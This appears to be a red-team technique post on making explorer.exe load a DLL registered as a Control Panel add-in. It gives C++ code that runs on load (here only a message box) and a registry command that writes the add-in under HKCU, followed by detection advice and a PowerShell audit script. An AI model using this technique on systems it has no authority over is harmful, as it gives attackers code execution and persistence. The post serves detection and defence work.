Code Execution through Control Panel Add-ins
It's possible to force explorer.exe to load your DLL that is compiled as a Control Panel Item and is registered as a Control Panel Add-in.
This technique could also be considered for persistence.

Execution

Let's compile our control panel item (a simple DLL with an exported function Cplapplet) from the code below:

```cpp
// pch.h must be the first include when the project uses MSVC precompiled headers
// (including Windows.h before it fails the build under /Yu); pch.h normally pulls
// Windows.h in already, so the explicit include after it is harmless.
#include "pch.h"
#include <Windows.h>

// Control Panel entry point. The documented export name is CPlApplet; the spelling
// does not matter here because the payload runs from DllMain as soon as the DLL is loaded.
extern "C" __declspec(dllexport) LONG Cplapplet(
    HWND hwndCpl,
    UINT msg,
    LPARAM lParam1,
    LPARAM lParam2
)
{
    MessageBoxA(NULL, "Hey there, I am now your control panel item you know.", "Control Panel", 0);
    return 1;
}

BOOL APIENTRY DllMain(HMODULE hModule,
    DWORD ul_reason_for_call,
    LPVOID lpReserved
)
{
    switch (ul_reason_for_call)
    {
    case DLL_PROCESS_ATTACH:
        // Executes inside the process that loaded the DLL (explorer.exe once registered as an add-in)
        Cplapplet(NULL, 0, 0, 0);
        break;
    case DLL_THREAD_ATTACH:
    case DLL_THREAD_DETACH:
    case DLL_PROCESS_DETACH:
        break;
    }
    return TRUE;
}
```
Let's now register our control panel item as an add-in (defenders beware of these registry modifications):
```cmd
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Control Panel\CPLs" /v spotless /d "C:\labs\cplAddin\cplAddin\x64\Release\cplAddin2.dll" /f
```
Now, whenever the Control Panel is opened, our DLL is loaded into explorer.exe and our code executes.
[Screenshot in the original post: the DLL shown loaded in explorer.exe]

Detection

  • Look for modifications to the following registry key: HKCU\Software\Microsoft\Windows\CurrentVersion\Control Panel\CPLs
  • Look for, or prevent, DLLs being loaded from untrusted locations (for example user-writable directories such as the C:\labs path used above)
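
The following PowerShell script is an added example of such a check and is not part of the original post. It enumerates the Control Panel add-in registrations under the HKCU key discussed above (plus its HKLM counterpart, which I add here as the machine-wide equivalent) and flags any registered DLL that lives outside the trusted directories, is registered from the user hive (no admin rights needed to write there), lacks a valid Authenticode signature, or is missing on disk. The list of trusted directories and the function name Get-CplAddinFindings are assumptions for this example; tune them to your environment.

```powershell
# Added example (not from the original post): audit Control Panel add-in registrations.
# Assumes it runs in the context of the user whose HKCU hive should be inspected.
$cplKeys = @(
    'HKCU:\Software\Microsoft\Windows\CurrentVersion\Control Panel\CPLs',
    'HKLM:\Software\Microsoft\Windows\CurrentVersion\Control Panel\CPLs'   # machine-wide counterpart (added here)
)

# Directories where legitimate CPL modules are expected (assumption; adjust per environment)
$trustedRoots = @(
    "$env:SystemRoot\System32",
    "$env:SystemRoot\SysWOW64",
    $env:ProgramFiles,
    ${env:ProgramFiles(x86)}
) | Where-Object { $_ } | ForEach-Object { $_.TrimEnd('\') }

function Get-CplAddinFindings {
    $findings = @()
    foreach ($key in $cplKeys) {
        if (-not (Test-Path -Path $key)) { continue }
        $props = Get-ItemProperty -Path $key
        # Skip the PS* metadata properties that Get-ItemProperty adds to every object
        $valueNames = $props.PSObject.Properties |
            Where-Object { $_.Name -notlike 'PS*' } |
            Select-Object -ExpandProperty Name
        foreach ($name in $valueNames) {
            $raw  = [string]$props.$name
            # Registered paths may be quoted or contain environment variables
            $path = [Environment]::ExpandEnvironmentVariables($raw.Trim('"'))
            $reasons = @()

            $inTrusted = $false
            foreach ($root in $trustedRoots) {
                if ($path.StartsWith($root, [StringComparison]::OrdinalIgnoreCase)) { $inTrusted = $true }
            }
            if (-not $inTrusted) { $reasons += 'outside trusted directories' }
            if ($key -like 'HKCU:*') { $reasons += 'registered in user hive (writable without admin rights)' }

            if (Test-Path -LiteralPath $path) {
                $sig = Get-AuthenticodeSignature -FilePath $path
                if ($sig.Status -ne 'Valid') { $reasons += "signature status: $($sig.Status)" }
            } else {
                $reasons += 'file missing on disk'
            }

            if ($reasons.Count -gt 0) {
                $findings += [pscustomobject]@{
                    Hive    = $key
                    Name    = $name
                    Path    = $path
                    Reasons = ($reasons -join '; ')
                }
            }
        }
    }
    return $findings
}

Get-CplAddinFindings | Format-Table -AutoSize
```

Run against the registration from this post, the output would list the value `spotless` with the C:\labs path flagged as outside the trusted directories, registered in the user hive, and (for an unsigned lab build) with a non-Valid signature status. For continuous monitoring rather than a point-in-time audit, the same key can be watched with Sysmon registry value-set events (Event ID 13) targeting the CPLs key path, and the load itself shows up as an image-load event in explorer.exe for a DLL outside the trusted roots.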

References